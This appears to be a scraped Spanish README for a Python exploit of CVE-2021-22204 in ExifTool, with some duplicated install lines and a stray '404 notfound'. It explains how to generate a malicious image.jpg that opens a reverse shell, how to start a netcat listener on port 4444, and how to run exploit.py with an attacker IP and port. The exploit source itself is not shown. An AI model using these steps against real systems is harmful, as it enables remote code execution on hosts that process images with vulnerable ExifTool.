
Exploit en Python para CVE-2021-22204 en ExifTool, que genera una imagen maliciosa que activa una reverse shell cuando es procesada por versiones vulnerables.
Exploit en Python para la vulnerabilidad CVE-2021-22204 en Exiftool.
404 notfound
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {Tu dirección IP} {Tu puerto de escucha}
./exploit.py {Tu dirección IP} {Tu puerto de escucha}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
La CVE-2021-22204 fue descubierta y reportada por William Bowling. (@wcbowling)
Este exploit fue creado estudiando el parche de exiftool después de que la CVE ya fuera reportada.
Y el image.jpg activará la vulnerabilidad cuando se abra con una versión vulnerable de exiftool.